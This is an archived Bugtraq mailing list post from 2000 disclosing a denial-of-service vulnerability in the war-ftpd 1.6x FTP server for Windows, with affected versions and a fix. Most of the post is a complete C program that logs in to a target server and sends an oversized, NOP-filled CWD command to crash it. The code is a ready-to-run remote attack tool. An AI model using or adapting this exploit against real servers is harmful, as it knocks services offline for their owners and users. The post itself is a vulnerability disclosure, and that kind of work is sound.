Bugtraq mailing list archives

war-ftpd 1.6x DoS

From: crc () SIRIUS IMASY OR JP (Toshimi Makino)
Date: Tue, 1 Feb 2000 16:58:46 +0900


Hello,

"war-ftpd" is very popular ftp server for Windows95/98/NT.
I found DoS problem to "war-ftpd 1.6x" recently.

Outline:
  It seems to occur because the bound check of the command of MKD/CWD
  that uses it is imperfect when this problem controls the directory.

  However, could not hijack the control of EIP so as long as I test.
  It is because not able to overwrite the RET address,
  because it seems to be checking buffer total capacity properly
  in 1.66x4 and later.

  The boundary of Access Violation breaks out among 8182 bytes
  from 533 bytes neighborhood although it differs by the thread
  that receives attack.

The version that is confirming this vulnerable point is as follows.
  1.66x4s, 1.67-3

The version that this vulnerable point was not found is as follows.
  1.71-0

Test Environments:
  Microsoft WindowsNT 4.0 Workstation SP6a Japanese version+IE4.0SP2
  Microsoft WindowsNT 4.0 Workstation SP5 Japanese version+IE4.0SP2
  Microsoft WindowsNT 4.0 Server SP4 Japanese version

Solution:
  1.70-1 should be used to solve this problem fundamentally.
  Because it becomes "Access denied" in 1.71-0 DoS did not break out.


---
warftpd-dos.c

I coded program for the reappearance of this problem.
The contents apply DoS attack for "war-ftpd" to the server
who is working from the remote.

/*--------------------------------------------------------------*/
/* war-ftpd 1.66x4s and 1.67-3 DoS sample by crc "warftpd-dos.c"*/
/*--------------------------------------------------------------*/

#include    <stdio.h>
#include    <string.h>
#include    <winsock.h>
#include    <windows.h>

#define     FTP_PORT        21
#define     MAXBUF          8182
//#define     MAXBUF          553
#define     MAXPACKETBUF    32000
#define     NOP             0x90

void main(int argc,char *argv[])
{
    SOCKET               sock;
    unsigned long        victimaddr;
    SOCKADDR_IN          victimsockaddr;
    WORD                 wVersionRequested;
    int                  nErrorStatus;
    static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
    hostent              *victimhostent;
    WSADATA              wsa;

    if (argc < 3){
        printf("Usage: %s TargetHost UserName Password\n",argv[0]); exit(1);
    }

    wVersionRequested = MAKEWORD(1, 1);
    nErrorStatus = WSAStartup(wVersionRequested, &wsa);
    if (atexit((void (*)(void))(WSACleanup))) {
        fprintf(stderr,"atexit(WSACleanup)failed\n"); exit(-1);
    }

    if ( nErrorStatus != 0 ) {
        fprintf(stderr,"Winsock Initialization failed\n"); exit(-1);
    }

    if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
        fprintf(stderr,"Can't create socket.\n"); exit(-1);
    }

    victimaddr = inet_addr((char*)argv[1]);
    if (victimaddr == -1) {
        victimhostent = gethostbyname(argv[1]);
        if (victimhostent == NULL) {
            fprintf(stderr,"Can't resolve specified host.\n"); exit(-1);
        }
        else
            victimaddr = *((unsigned long *)((victimhostent->h_addr_list)[0]));
    }

    victimsockaddr.sin_family        = AF_INET;
    victimsockaddr.sin_addr.s_addr  = victimaddr;
    victimsockaddr.sin_port  = htons((unsigned short)FTP_PORT);
    memset(victimsockaddr.sin_zero,(int)0,sizeof(victimsockaddr.sin_zero));

    if(connect(sock,(struct sockaddr *)&victimsockaddr,sizeof(victimsockaddr)) == SOCKET_ERROR){
        fprintf(stderr,"Connection refused.\n"); exit(-1);
    }

    printf("Attacking war-ftpd ...\n");
    recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
    sprintf((char *)packetbuf,"USER %s\r\n",argv[2]);
    send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
    recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
    sprintf((char *)packetbuf,"PASS %s\r\n",argv[3]);
    send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
    recv(sock,(char *)packetbuf,MAXPACKETBUF,0);

    memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;

    sprintf((char *)packetbuf,"CWD %s\r\n",buf);
    send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);

    Sleep(100);
    shutdown(sock, 2);
    closesocket(sock);
    WSACleanup();
    printf("done.\n");
}

----
       Toshimi Makino   E-mail:crc () sirius imasy or jp

Current thread:

Re: SyGate 3.11 Port 7323 / Remote Admin hole Brian Hampson (Jan 31)
- <Possible follow-ups>
- Re: SyGate 3.11 Port 7323 / Remote Admin hole Russ (Feb 01)
  - war-ftpd 1.6x DoS Toshimi Makino (Jan 31)
    - Re: war-ftpd 1.6x DoS Jarle Aase (Feb 02)
  - [xforce () iss net: ISSalert: ISS E-Security Alert: Form Tampering Vulnerabilities in Several Web-Based Shopping Cart Applications] Patrick Oonk (Feb 01)
    - Re: [xforce () iss net: ISSalert: ISS E-Security Alert: Form Tampering Vulnerabilities in Several Web-Based Shopping Cart Applications] Erik Gjertsen (Feb 03)
  - SV: SyGate 3.11 Port 7323 / Remote Admin hole Sani Huttunen (Feb 01)
  - vulnerability in Linux Debian default boot configuration Pierre Beyssac (Feb 02)
  - [Debian] New version of apcd released Aleph One (Feb 02)
  - Webspeed security issue George (Feb 03)